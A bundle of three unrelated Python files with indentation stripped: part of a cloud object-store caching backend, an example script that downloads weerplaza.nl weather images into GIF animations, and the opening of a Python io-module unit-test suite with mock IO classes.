log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
# alt_name can contain parent directory references, but S3 will not
# follow them, so if they are valid we normalize them out
alt_name = os.path.normpath(alt_name)
rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj)))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# for JOB_WORK directory
if obj_dir:
rel_path = os.path.join(rel_path, str(self._get_object_id(obj)))
if base_dir:
base = self.extra_dirs.get(base_dir)
return os.path.join(base, rel_path)
# S3 folders are marked by having trailing '/' so add it now
rel_path = f'{rel_path}/'
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat")
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_cloud(self, rel_path):
try:
obj = self.bucket.objects.get(rel_path)
if obj:
return obj.size
except Exception:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.objects.list(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
exists = True if self.bucket.objects.get(rel_path) is not None else False
except Exception:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.objects.get(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
ret_code = subprocess.call(f"axel -a -n {ncores} '{url}'")
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
with open(self._get_cache_path(rel_path), "w+") as downloaded_file_handle:
key.save_content(downloaded_file_handle)
return True
except Exception:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
if os.path.getsize(source_file) == 0 and (self.bucket.objects.get(rel_path) is not None):
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file,
rel_path)
return True
if from_string:
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload(source_file)
else:
self.bucket.objects.get(rel_path).upload(source_file)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file,
os.path.getsize(source_file), rel_path)
self.transfer_progress = 0 # Reset transfer progress counter
if not self.bucket.objects.get(rel_path):
created_obj = self.bucket.objects.create(rel_path)
created_obj.upload_from_file(source_file)
else:
self.bucket.objects.get(rel_path).upload_from_file(source_file)
end_time = datetime.now()
log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except Exception:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_cloud(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_cloud(rel_path))
return False
def _exists(self, obj, **kwargs):
in_cache = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check cloud
in_cloud = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
base_dir = kwargs.get('base_dir', None)
if dir_only:
if in_cache or in_cloud:
return True
# for JOB_WORK directory
elif base_dir:
if not os.path.exists(rel_path):
os.makedirs(rel_path)
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_cloud:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_cloud:
return True
else:
return False
def _create(self, obj, **kwargs):
if not self._exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj)))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else f"dataset_{self._get_object_id(obj)}.dat")
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def _empty(self, obj, **kwargs):
if self._exists(obj, **kwargs):
return bool(self._size(obj, **kwargs) > 0)
else:
raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def _size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try cloud. Error: %s", rel_path, ex)
elif self._exists(obj, **kwargs):
return self._get_size_in_cloud(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def _delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
try:
# Remove temparory data in JOB_WORK directory
if base_dir and dir_only and obj_dir:
shutil.rmtree(os.path.abspath(rel_path))
return True
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
# but requires iterating through each individual key in S3 and deleing it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path))
results = self.bucket.objects.list(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
os.unlink(self._get_cache_path(rel_path))
# Delete from S3 as well
if self._key_exists(rel_path):
key = self.bucket.objects.get(rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except Exception:
log.exception("Could not delete key '%s' from cloud", rel_path)
except OSError:
log.exception('%s delete error', self._get_filename(obj, **kwargs))
return False
def _get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path))
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def _get_filename(self, obj, **kwargs):
base_dir = kwargs.get('base_dir', None)
dir_only = kwargs.get('dir_only', False)
obj_dir = kwargs.get('obj_dir', False)
rel_path = self._construct_path(obj, **kwargs)
# for JOB_WORK directory
if base_dir and dir_only and obj_dir:
return os.path.abspath(rel_path)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self._exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s'
% (str(obj), str(kwargs)))
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def _update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self._create(obj, **kwargs)
if self._exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Chose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on cloud
self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% (str(obj), str(kwargs)))
def _get_object_url(self, obj, **kwargs):
if self._exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = self.bucket.objects.get(rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except Exception:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def _get_store_usage_percent(self):
return 0.0
|
weerplaza_eg.py
|
# -*- coding: utf-8 -*-
''' File contains examples for how to use the function from the anim library
for downloading images from weerplaza.nl'''
__author__ = 'Mark Zwaving'
__email__ = 'markzwaving@gmail.com'
__copyright__ = 'Copyright (C) Mark Zwaving. All rights reserved.'
__license__ = 'MIT License'
__version__ = '0.0.7'
__maintainer__ = 'Mark Zwaving'
__status__ = 'Development'
# Python version > 3.7 (fstring
import common.config as cfg # Configuration defaults. See config.py
import common.model.animation as anim # import animation library
import threading, time # Multi processing and time
# Example download image urls from weerplaza
url_base_10min = 'https://oud.weerplaza.nl/gdata/10min' # Base url 10min
url_t10cm = f'{url_base_10min}/GMT_T10C_latest.png' # Temp 10cm
url_weerbeeld = f'{url_base_10min}/nl_10min.jpg' # Weerbeeld
url_t2meter = f'{url_base_10min}/GMT_TTTT_latest.png' # Temp 2 meter
def weerplaza_10min(url, verbose=None):
'''Easy wrapper fn. For interval downloading images. With default values
from config.py.'''
interval_download_animation( url, # Give a downloadurl
download_map = cfg.dir_download, # Map for downloading the images too
animation_map = cfg.dir_animation, # Map for the animations
animation_name = '', # The path/name of the animation file
interval_download = 10, # Interval time for downloading Images (minutes)
duration_download = 60, # Total time for downloading all the images (minutes)
animation_time = 0.7, # Animation interval time for gif animation
remove_download = False, # Remove the downloaded images
gif_compress = True, # Compress the size of the animation
date_submap = True, # Set True to create extra date submaps
date_subname = True, # Set True to create extra date in files
check = False, # No double downloads check
verbose = False # Overwrite verbose -> see config.py
)
if __name__ == "__main__":
############################################################################
# Weerplaza eg: 10 minutes refresh images
# EG. Temp 2 meter
# interval_download_animation( url_t2meter, # Give a downloadurl
# download_map = cfg.dir_download, # Map for downloading the images too
# animation_map = cfg.dir_animation, # Map for the animations
# animation_name = '', # The path/name of the animation file
# interval_download = 10, # Interval time for downloading Images (minutes)
# duration_download = 60, # Total time for downloading all the images (minutes)
# animation_time = 0.7, # Animation interval time for gif animation
# remove_download = False, # Remove the downloaded images
# gif_compress = True, # Compress the size of the animation
# date_submap = True, # Set True to create extra date submaps
# date_subname = True, # Set True to create extra date in files
# check = True, # No double downloads check
# verbose = None # Overwrite verbose -> see config.py
# )
# See above
# anim time, rm downloads, compress gif, date submap, date subname, check download, verbose
at, rm, cp, ds, dn, ck, vb = 0.7, False, True, True, True, True, True
dm, am = cfg.dir_download, cfg.dir_animation # Base maps (shortened)
nm = 'wp_animation_temp.gif' # Name file
it = 10 # interval time (minutes)
du = 10 # duration time (minutes)
anim.interval_download_animation(url_t2meter, dm, am, nm, it, du, at, rm, cp, ds, dn, ck, vb)
# ############################################################################
# # Example multi processing. Download multiple images at the same time
#
# # Clock timer set to False. Cannot have multiple timers at the same time
# cfg.timer = False # Timer is off (=false)
#
# # Start 3 threads for downloading three images at the same time
# for url in [ url_t10cm, url_weerbeeld, url_t2meter ]: # Three images for downloading
# threading.Thread( target=weerplaza_10min, args=(url,) ).start() # Start new process
# time.sleep(30) # Start another thread after 20 seconds
|
test_io.py
|
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import sysconfig
import threading
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
from test.support import FakePath
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import ctypes
except ImportError:
def byteslike(*pos, **kw):
return array.array("b", bytes(*pos, **kw))
else:
def byteslike(*pos, **kw):
"""Create a bytes-like object having no string or sequence methods"""
data = bytes(*pos, **kw)
obj = EmptyStruct()
ctypes.resize(obj, len(data))
memoryview(obj).cast("B")[:] = data
return obj
class EmptyStruct(ctypes.Structure):
pass
_cflags = sysconfig.get_config_var('CFLAGS') or ''
_config_args = sysconfig.get_config_var('CONFIG_ARGS') or ''
MEMORY_SANITIZER = (
'-fsanitize=memory' in _cflags or
'--with-memory-sanitizer' in _config_args
)
# Does io.IOBase finalizer log the exception if the close() method fails?
# The exception is ignored silently by default in release build.
IOBASE_EMITS_UNRAISABLE = (hasattr(sys, "gettotalrefcount") or sys.flags.dev_mode)
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class SlowFlushRawIO(MockRawIO):
def __init__(self):
super().__init__()
self.in_flush = threading.Event()
def flush(self):
self.in_flush.set()
time.sleep(0.25)
class CSlowFlushRawIO(SlowFlushRawIO, io.RawIOBase):
pass
class PySlowFlushRawIO(SlowFlushRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
def truncate(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence=0):
# naive implementation, enough for tests
return 0
def writable(self):
return True
def write(self, b):
b = bytes(b)
n = -1
if self._blocker_char:
try:
n = b.index(self._blocker_char)
except ValueError:
pass
else:
if n > 0:
# write data up to the first blocker
self._write_stack.append(b[:n])
return n
else:
# cancel blocker and indicate would block
self._blocker_char = None
return None
self._write_stack.append(b)
return len(b)
class CMockNonBlockWriterIO(MockNonBlockWriterIO, io.RawIOBase):
BlockingIOError = io.BlockingIOError
class PyMockNonBlockWriterIO(MockNonBlockWriterIO, pyio.RawIOBase):
BlockingIOError = pyio.BlockingIOError
class IOTest(unittest.TestCase):
def setUp(self):
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def write_ops(self, f):
self.assertEqual(f.write(b"blah."), 5)
f.truncate(0)
self.assertEqual(f.tell(), 5)
f.seek(0)
self.assertEqual(f.write(b"blah."), 5)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"Hello."), 6)
self.assertEqual(f.tell(), 6)
self.assertEqual(f.seek(-1, 1), 5)
self.assertEqual(f.tell(), 5)
buffer = bytearray(b" world\n\n\n")
self.assertEqual(f.write(buffer), 9)
buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(support.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(support.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(support.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(support.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(support.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(support.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(support.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(support.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(support.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(support.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
